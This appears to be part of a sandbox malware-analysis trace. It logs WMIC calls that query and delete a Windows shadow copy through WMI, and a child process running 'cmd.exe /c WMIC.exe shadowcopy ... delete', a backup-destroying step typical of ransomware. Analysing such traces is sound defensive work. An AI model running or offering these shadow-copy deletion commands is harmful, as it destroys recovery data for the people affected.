CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0125.206] lstrlenW (lpString="delete") returned 6 [0125.206] malloc (_Size=0xe) returned 0x28cbc0 [0125.206] lstrlenW (lpString="delete") returned 6 [0125.206] lstrlenW (lpString="GET") returned 3 [0125.206] lstrlenW (lpString="delete") returned 6 [0125.206] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0125.206] lstrlenW (lpString="LIST") returned 4 [0125.206] lstrlenW (lpString="delete") returned 6 [0125.206] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0125.206] lstrlenW (lpString="SET") returned 3 [0125.206] lstrlenW (lpString="delete") returned 6 [0125.206] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0125.206] lstrlenW (lpString="CREATE") returned 6 [0125.206] lstrlenW (lpString="delete") returned 6 [0125.206] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0125.206] lstrlenW (lpString="CALL") returned 4 [0125.206] lstrlenW (lpString="delete") returned 6 [0125.206] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0125.206] lstrlenW (lpString="ASSOC") returned 5 [0125.206] lstrlenW (lpString="delete") returned 6 [0125.206] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0125.206] lstrlenW (lpString="DELETE") returned 6 [0125.206] lstrlenW (lpString="delete") returned 6 [0125.206] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0125.207] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0125.207] malloc (_Size=0x3e) returned 0x28d080 [0125.207] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0125.207] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0125.207] malloc (_Size=0x18) returned 0x28cc00 [0125.207] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0125.207] lstrlenW (lpString="FROM") returned 4 [0125.207] lstrlenW (lpString="*") returned 1 [0125.207] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0125.207] malloc (_Size=0x18) returned 0x28cb80 [0125.207] free (_Block=0x28cc00) [0125.207] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0125.207] lstrlenW (lpString="FROM") returned 4 [0125.207] lstrlenW (lpString="from") returned 4 [0125.207] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0125.207] malloc (_Size=0x18) returned 0x28cc00 [0125.207] free (_Block=0x28cb80) [0125.207] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0125.207] malloc (_Size=0x18) returned 0x28cb80 [0125.207] free (_Block=0x28cc00) [0125.207] free (_Block=0x28d080) [0125.207] free (_Block=0x28cb80) [0125.207] lstrlenW (lpString="SET") returned 3 [0125.208] lstrlenW (lpString="delete") returned 6 [0125.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0125.208] lstrlenW (lpString="CREATE") returned 6 [0125.208] lstrlenW (lpString="delete") returned 6 [0125.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0125.208] free (_Block=0x28cef0) [0125.208] malloc (_Size=0x8) returned 0x286f20 [0125.208] lstrlenW (lpString="GET") returned 3 [0125.208] lstrlenW (lpString="delete") returned 6 [0125.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0125.208] lstrlenW (lpString="LIST") returned 4 [0125.208] lstrlenW (lpString="delete") returned 6 [0125.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0125.208] lstrlenW (lpString="ASSOC") returned 5 [0125.208] lstrlenW (lpString="delete") returned 6 [0125.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0125.208] WbemLocator:IUnknown:AddRef (This=0x1d91390) returned 0x3 [0125.208] free (_Block=0x40dfb0) [0125.208] lstrlenW (lpString="") returned 0 [0125.208] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.208] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0125.208] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.208] malloc (_Size=0x14) returned 0x28cb80 [0125.208] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.208] GetCurrentThreadId () returned 0xa10 [0125.208] GetCurrentProcess () returned 0xffffffffffffffff [0125.208] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1cf700 | out: TokenHandle=0x1cf700*=0x27c) returned 1 [0125.208] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cf6f8 | out: TokenInformation=0x0, ReturnLength=0x1cf6f8) returned 0 [0125.208] malloc (_Size=0x118) returned 0x28d080 [0125.208] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x28d080, TokenInformationLength=0x118, ReturnLength=0x1cf6f8 | out: TokenInformation=0x28d080, ReturnLength=0x1cf6f8) returned 1 [0125.208] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x28d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1338835090, Attributes=0x755b), (Luid.LowPart=0x0, Luid.HighPart=2674416, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0125.208] free (_Block=0x28d080) [0125.209] CloseHandle (hObject=0x27c) returned 1 [0125.209] lstrlenW (lpString="GET") returned 3 [0125.209] lstrlenW (lpString="delete") returned 6 [0125.209] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0125.209] lstrlenW (lpString="LIST") returned 4 [0125.209] lstrlenW (lpString="delete") returned 6 [0125.209] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0125.209] lstrlenW (lpString="SET") returned 3 [0125.209] lstrlenW (lpString="delete") returned 6 [0125.209] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0125.209] lstrlenW (lpString="CALL") returned 4 [0125.209] lstrlenW (lpString="delete") returned 6 [0125.209] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0125.209] lstrlenW (lpString="ASSOC") returned 5 [0125.209] lstrlenW (lpString="delete") returned 6 [0125.209] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0125.209] lstrlenW (lpString="CREATE") returned 6 [0125.209] lstrlenW (lpString="delete") returned 6 [0125.209] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0125.209] lstrlenW (lpString="DELETE") returned 6 [0125.209] lstrlenW (lpString="delete") returned 6 [0125.209] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0125.209] malloc (_Size=0x18) returned 0x28cc00 [0125.209] lstrlenA (lpString="") returned 0 [0125.209] malloc (_Size=0x2) returned 0x40dfb0 [0125.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffdf314c, cbMultiByte=-1, lpWideCharStr=0x40dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0125.209] free (_Block=0x40dfb0) [0125.209] malloc (_Size=0x18) returned 0x28cca0 [0125.209] lstrlenA (lpString="") returned 0 [0125.209] malloc (_Size=0x2) returned 0x40dfb0 [0125.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffdf314c, cbMultiByte=-1, lpWideCharStr=0x40dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0125.210] free (_Block=0x40dfb0) [0125.210] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0125.210] malloc (_Size=0x3e) returned 0x28d080 [0125.210] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0125.210] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0125.210] malloc (_Size=0x18) returned 0x28cba0 [0125.210] free (_Block=0x28cca0) [0125.210] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0125.210] lstrlenW (lpString="FROM") returned 4 [0125.210] lstrlenW (lpString="*") returned 1 [0125.210] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0125.210] malloc (_Size=0x18) returned 0x28cca0 [0125.210] free (_Block=0x28cba0) [0125.210] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0125.210] lstrlenW (lpString="FROM") returned 4 [0125.210] lstrlenW (lpString="from") returned 4 [0125.210] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0125.210] malloc (_Size=0x18) returned 0x28cba0 [0125.210] free (_Block=0x28cca0) [0125.210] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0125.210] malloc (_Size=0x18) returned 0x28cca0 [0125.210] free (_Block=0x28cba0) [0125.210] free (_Block=0x28d080) [0125.210] malloc (_Size=0x18) returned 0x28cba0 [0125.210] malloc (_Size=0x18) returned 0x28cc20 [0125.210] malloc (_Size=0x18) returned 0x28cc40 [0125.210] malloc (_Size=0x18) returned 0x28cc60 [0125.211] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0125.211] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0125.211] malloc (_Size=0x18) returned 0x28cc80 [0125.211] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0125.211] SysStringLen (param_1=" WHERE ") returned 0x7 [0125.211] malloc (_Size=0x18) returned 0x28ccc0 [0125.211] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0125.211] SysStringLen (param_1="ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'") returned 0x2b [0125.211] free (_Block=0x28cc00) [0125.211] free (_Block=0x28cc80) [0125.211] free (_Block=0x28cc60) [0125.211] free (_Block=0x28cc40) [0125.211] free (_Block=0x28cc20) [0125.211] free (_Block=0x28cba0) [0125.211] ??0CHString@@QEAA@XZ () returned 0x1cf670 [0125.211] GetCurrentThreadId () returned 0xa10 [0125.211] malloc (_Size=0x18) returned 0x28cba0 [0125.211] malloc (_Size=0x18) returned 0x28cc20 [0125.211] malloc (_Size=0x18) returned 0x28cc40 [0125.211] malloc (_Size=0x18) returned 0x28cc60 [0125.211] malloc (_Size=0x18) returned 0x28cc80 [0125.211] SysStringLen (param_1="\\\\") returned 0x2 [0125.211] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0125.212] malloc (_Size=0x18) returned 0x28cc00 [0125.212] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0125.212] SysStringLen (param_1="\\") returned 0x1 [0125.212] malloc (_Size=0x18) returned 0x28cce0 [0125.212] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0125.212] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0125.212] free (_Block=0x28cc00) [0125.212] free (_Block=0x28cc80) [0125.212] free (_Block=0x28cc60) [0125.212] free (_Block=0x28cc40) [0125.212] free (_Block=0x28cc20) [0125.212] free (_Block=0x28cba0) [0125.212] malloc (_Size=0x18) returned 0x28cba0 [0125.212] malloc (_Size=0x18) returned 0x28cc20 [0125.212] malloc (_Size=0x18) returned 0x28cc40 [0125.212] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d91390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffe629d0 | out: ppNamespace=0xffe629d0*=0x1da3c18) returned 0x0 [0125.215] free (_Block=0x28cc40) [0125.215] free (_Block=0x28cc20) [0125.215] free (_Block=0x28cba0) [0125.215] CoSetProxyBlanket (pProxy=0x1da3c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0125.215] free (_Block=0x28cce0) [0125.215] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0125.215] ??0CHString@@QEAA@XZ () returned 0x1cf5c0 [0125.215] GetCurrentThreadId () returned 0xa10 [0125.215] malloc (_Size=0x18) returned 0x28cce0 [0125.215] lstrlenA (lpString="") returned 0 [0125.215] malloc (_Size=0x2) returned 0x40dfb0 [0125.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffdf314c, cbMultiByte=-1, lpWideCharStr=0x40dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0125.215] free (_Block=0x40dfb0) [0125.215] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'") returned 0x50 [0125.215] SysStringLen (param_1="") returned 0x0 [0125.215] free (_Block=0x28cce0) [0125.215] malloc (_Size=0x18) returned 0x28cce0 [0125.215] IWbemServices:ExecQuery (in: This=0x1da3c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'", lFlags=0, pCtx=0x0, ppEnum=0x1cf5c8 | out: ppEnum=0x1cf5c8*=0x1da3d18) returned 0x0 [0125.233] free (_Block=0x28cce0) [0125.233] CoSetProxyBlanket (pProxy=0x1da3d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0125.235] IEnumWbemClassObject:Next (in: This=0x1da3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf5d0, puReturned=0x1cf5e0 | out: apObjects=0x1cf5d0*=0x1da3d80, puReturned=0x1cf5e0*=0x1) returned 0x0 [0125.236] malloc (_Size=0x18) returned 0x28cce0 [0125.236] IWbemClassObject:Get (in: This=0x1da3d80, wszName="__PATH", lFlags=0, pVal=0x1cf5f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x1cf5f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0125.236] free (_Block=0x28cce0) [0125.237] malloc (_Size=0x800) returned 0x28d080 [0125.237] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x28d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0125.237] FormatMessageW (in: dwFlags=0x2500, lpSource=0x28d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x1cf518, nSize=0x0, Arguments=0x1cf528 | out: lpBuffer="뚐8") returned 0x67 [0125.237] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0125.237] malloc (_Size=0x68) returned 0x28d890 [0125.237] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x28d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0125.237] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xffe62ab0 [0125.237] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0125.237] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0125.237] free (_Block=0x28d890) [0125.237] free (_Block=0x28d080) [0125.237] LocalFree (hMem=0x38b690) returned 0x0 [0125.237] IWbemServices:DeleteInstance (in: This=0x1da3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0130.263] IUnknown:Release (This=0x1da3d80) returned 0x0 [0130.263] malloc (_Size=0x800) returned 0x28d080 [0130.263] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x28d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0130.263] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0130.263] malloc (_Size=0x20) returned 0x28cef0 [0130.264] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x28cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0130.264] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xffe62ab0 [0130.264] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0130.267] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0130.267] free (_Block=0x28cef0) [0130.267] free (_Block=0x28d080) [0130.267] IEnumWbemClassObject:Next (in: This=0x1da3d18, lTimeout=-1, uCount=0x1, apObjects=0x1cf5d0, puReturned=0x1cf5e0 | out: apObjects=0x1cf5d0*=0x0, puReturned=0x1cf5e0*=0x0) returned 0x1 [0130.269] IUnknown:Release (This=0x1da3d18) returned 0x0 [0130.285] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0130.285] free (_Block=0x28cca0) [0130.285] free (_Block=0x28ccc0) [0130.285] GetCurrentThreadId () returned 0xa10 [0130.285] ??0CHString@@QEAA@PEBG@Z () returned 0x1cf7a8 [0130.285] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x1cf7a8 [0130.292] lstrlenW (lpString="LIST") returned 4 [0130.306] lstrlenW (lpString="delete") returned 6 [0130.306] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0130.306] lstrlenW (lpString="ASSOC") returned 5 [0130.306] lstrlenW (lpString="delete") returned 6 [0130.306] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0130.306] lstrlenW (lpString="GET") returned 3 [0130.306] lstrlenW (lpString="delete") returned 6 [0130.306] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0130.306] ??1CHString@@QEAA@XZ () returned 0x5132fd01 [0130.307] WbemLocator:IUnknown:Release (This=0x1da3c18) returned 0x0 [0130.307] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0130.307] _kbhit () returned 0x0 [0130.321] free (_Block=0x286f20) [0130.321] free (_Block=0x28cac0) [0130.321] free (_Block=0x28caa0) [0130.321] free (_Block=0x28ca80) [0130.321] free (_Block=0x28ca60) [0130.321] free (_Block=0x2870a0) [0130.321] free (_Block=0x28cb40) [0130.321] free (_Block=0x2885c0) [0130.321] free (_Block=0x28d020) [0130.321] free (_Block=0x28cbc0) [0130.321] free (_Block=0x28cfa0) [0130.321] free (_Block=0x28cae0) [0130.321] free (_Block=0x28cbe0) [0130.322] free (_Block=0x287140) [0130.322] free (_Block=0x286e00) [0130.322] free (_Block=0x28cff0) [0130.322] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0130.322] free (_Block=0x28ce20) [0130.322] free (_Block=0x28cb00) [0130.322] free (_Block=0x28cb20) [0130.322] free (_Block=0x28cf30) [0130.322] free (_Block=0x28cb60) [0130.322] free (_Block=0x287ee0) [0130.322] free (_Block=0x287f30) [0130.322] free (_Block=0x287f80) [0130.322] free (_Block=0x28cb80) [0130.322] free (_Block=0x286a20) [0130.322] free (_Block=0x286de0) [0130.322] free (_Block=0x288040) [0130.322] free (_Block=0x286dc0) [0130.322] free (_Block=0x288000) [0130.322] free (_Block=0x286d60) [0130.322] free (_Block=0x286d80) [0130.323] free (_Block=0x286c40) [0130.323] free (_Block=0x286c60) [0130.323] free (_Block=0x286be0) [0130.323] free (_Block=0x286c00) [0130.323] free (_Block=0x286ca0) [0130.323] free (_Block=0x286cc0) [0130.323] free (_Block=0x286d00) [0130.323] free (_Block=0x286d20) [0130.323] free (_Block=0x286b20) [0130.323] free (_Block=0x286b40) [0130.323] free (_Block=0x286ac0) [0130.323] free (_Block=0x286ae0) [0130.323] free (_Block=0x286b80) [0130.323] free (_Block=0x286ba0) [0130.323] free (_Block=0x286a60) [0130.323] free (_Block=0x286a80) [0130.323] free (_Block=0x2869d0) [0130.323] free (_Block=0x2869a0) [0130.323] free (_Block=0x286e90) [0130.323] WbemLocator:IUnknown:Release (This=0x1d91390) returned 0x2 [0130.323] WbemLocator:IUnknown:Release (This=0x1da3b28) returned 0x0 [0130.324] WbemLocator:IUnknown:Release (This=0x1da3a98) returned 0x0 [0130.325] WbemLocator:IUnknown:Release (This=0x1d91390) returned 0x1 [0130.325] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0130.325] WbemLocator:IUnknown:Release (This=0x1d91390) returned 0x0 [0130.325] free (_Block=0x28c9e0) [0130.325] free (_Block=0x28ca00) [0130.325] free (_Block=0x288540) [0130.325] free (_Block=0x28ca20) [0130.325] free (_Block=0x28ca40) [0130.325] free (_Block=0x288580) [0130.325] free (_Block=0x28c860) [0130.325] free (_Block=0x28c880) [0130.325] free (_Block=0x2883c0) [0130.325] free (_Block=0x28c8a0) [0130.325] free (_Block=0x28c8c0) [0130.325] free (_Block=0x288400) [0130.325] free (_Block=0x28c7e0) [0130.325] free (_Block=0x28c800) [0130.326] free (_Block=0x288340) [0130.326] free (_Block=0x28c820) [0130.326] free (_Block=0x28c840) [0130.326] free (_Block=0x288380) [0130.326] free (_Block=0x28c960) [0130.326] free (_Block=0x28c980) [0130.326] free (_Block=0x2884c0) [0130.326] free (_Block=0x28c9a0) [0130.326] free (_Block=0x28c9c0) [0130.326] free (_Block=0x288500) [0130.326] free (_Block=0x28c760) [0130.326] free (_Block=0x28c780) [0130.326] free (_Block=0x2882c0) [0130.326] free (_Block=0x28c7a0) [0130.326] free (_Block=0x28c7c0) [0130.326] free (_Block=0x288300) [0130.326] free (_Block=0x28c8e0) [0130.326] free (_Block=0x28c900) [0130.326] free (_Block=0x288440) [0130.326] free (_Block=0x28c920) [0130.326] free (_Block=0x28c940) [0130.327] free (_Block=0x288480) [0130.327] free (_Block=0x28c6a0) [0130.327] free (_Block=0x28c6c0) [0130.327] free (_Block=0x288200) [0130.327] free (_Block=0x28c560) [0130.327] free (_Block=0x28c580) [0130.327] free (_Block=0x2880c0) [0130.327] free (_Block=0x286e50) [0130.327] free (_Block=0x286e70) [0130.327] free (_Block=0x288080) [0130.327] free (_Block=0x28c5e0) [0130.327] free (_Block=0x28c600) [0130.327] free (_Block=0x288140) [0130.327] free (_Block=0x28c6e0) [0130.327] free (_Block=0x28c700) [0130.327] free (_Block=0x288240) [0130.327] free (_Block=0x28c5a0) [0130.327] free (_Block=0x28c5c0) [0130.327] free (_Block=0x288100) [0130.327] free (_Block=0x28c620) [0130.327] free (_Block=0x28c640) [0130.328] free (_Block=0x288180) [0130.328] free (_Block=0x28c660) [0130.328] free (_Block=0x28c680) [0130.328] free (_Block=0x2881c0) [0130.328] free (_Block=0x28c720) [0130.328] free (_Block=0x28c740) [0130.328] free (_Block=0x288280) [0130.328] CoUninitialize () [0130.415] exit (_Code=0) [0130.415] free (_Block=0x28cd30) [0130.415] free (_Block=0x287ea0) [0130.415] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0130.415] free (_Block=0x286f40) [0130.415] free (_Block=0x286a40) [0130.415] free (_Block=0x287e60) [0130.415] free (_Block=0x287e20) [0130.415] free (_Block=0x287dd0) [0130.415] free (_Block=0x287d90) [0130.415] free (_Block=0x287d30) [0130.416] free (_Block=0x285a90) [0130.416] free (_Block=0x285a50) [0130.416] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0130.416] free (_Block=0x28cec0) Thread: id = 260 os_tid = 0x644 Thread: id = 261 os_tid = 0x124 Thread: id = 262 os_tid = 0x760 Thread: id = 263 os_tid = 0xb08 Thread: id = 264 os_tid = 0xa14 Process: id = "52" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x1f93f000" os_pid = "0xa6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" 